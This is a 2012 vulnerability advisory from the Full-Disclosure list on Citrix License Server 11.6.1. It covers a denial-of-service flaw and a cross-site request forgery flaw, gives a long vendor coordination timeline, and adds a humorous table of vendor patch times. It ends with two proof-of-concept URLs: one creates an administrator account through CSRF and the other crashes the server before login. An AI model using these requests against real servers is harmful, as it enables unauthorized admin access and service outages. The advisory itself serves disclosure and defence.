nSense Vulnerability Research Security Advisory NSENSE-2012-001 --------------------------------------------------------------- Affected Vendor: Citrix Affected Product: Citrix License Server 11.6.1 build 10007 Impact: DoS, CSRF Vendor response: New version released CVE: N/A Credit: Rune & Knud aka Smurfbuddies / nSense Release date: 15 Mar 2012 Vendor link: http://support.citrix.com/article/CTX128167 Technical details --------------------------------------------------------------- The license server web management interface contains two vulnerabilities: 1) Denial-of-Service vulnerability which allows an unauthenticated attacker to crash the license server. 2) Cross Site Request Forgery vulnerability which enables an attacker to create additional users in the management interface, IF a logged-in administrator can be lured to visit a link pointing to the vulnerable functionality. Timeline: 2010-12-20 Sent an e-mail to secure@citrix.com with vulnerability details 2010-12-20 Citrix acknowledged the submission and opened a case 2011-01-31 Requested a status update 2011-01-31 Citrix replied, stated vulnerabilities are in a third party component 2011-01-31 Requested more detailed information about the patch schedule 2011-02-14 Requested a status update 2011-02-14 Citrix replied 2011-02-16 Requested more detailed information to justify deadline extension 2011-02-17 Citrix replied 2011-02-17 Requested information about the bulletin 2011-02-17 Citrix replied 2011-02-23 Citrix delivered bulletin information 2011-02-23 Requested information regarding the bulletin 2011-02-23 Citrix replied 2011-02-24 Supplied Citrix information about nSense disclosure policy 2011-03-20 Requested information about the patch schedule 2011-03-29 Requested a status update 2011-03-30 Enquired whether e-mails had been received 2011-03-30 Received an e-mail bounce 550 5.2.0 STOREDRV from support@citrix.com 2011-03-31 Citrix replied 2011-03-31 Acknowledged continuing coordination 2011-04-19 Requested a status update 2011-05-25 Requested a status update 2011-06-15 Requested a status update 2011-06-16 Citrix replied 2011-07-17 Requested a status update 2011-08-17 Requested a status update 2011-08-17 Citrix replied 2011-10-12 Requested a status update 2011-10-21 Requested a status update 2011-10-21 Citrix replied. Still validating patches, still no release date set 2011-11-18 Requested a status update. Sent timeline to Citrix 2011-12-05 Citrix replied. Targeting February 2012. Citrix promised to send new information if the planned schedule changes 2012-02-29 February 2012 officially over. No news from Citrix 2012-03-02 Citrix informed they are preparing a release 2012-03-05 Replied and specified credit information 2012-03-13 Citrix replied. Sent knowledge base link 2012-03-15 Advisory released. Old nSense vulnerability coordination policy officially terminated. Proof-of-Concept: http://citrix-license-server-ip:8082/users?licenseTab=&selected =&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&con firm=xsrf&accountType=admin&originalAccountType=&Create=Save (Administrator CSRF) http://citrix-license-server-ip:8082/dashboard? =2 (pre auth DoS, crashes lmadmin.exe) Note! The lmadmin crash was _not_ analyzed in any way. Additional information ---------------------- As our current vulnerability coordination policy has come to an end, we wanted to share with you some of the lap times from vendors who have gone through our test track. Vendor with a reasonably-priced vulnerability Leaderboard ----------- VeryPDF: 1 week Nullsoft: 2 weeks Adobe: 2 months Cisco: 2.5 months SAP: 2.5 months Adobe: 3 months Teamspeak: 3 months / no patch (CERT-FI) Azeotech: 3.5 months (ICS-CERT) Angelina Jolie*: 5 months (ICS-CERT) Apple: 6 months Novell: 8 months Citrix: 15 months * Bill Bailey, or was it Scadatec? And on this bombshell, it is time to end. Good night! --------------------------------------------------------------- http://www.nsense.dk http://www.nsense.fi http://www.nsense.pl _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/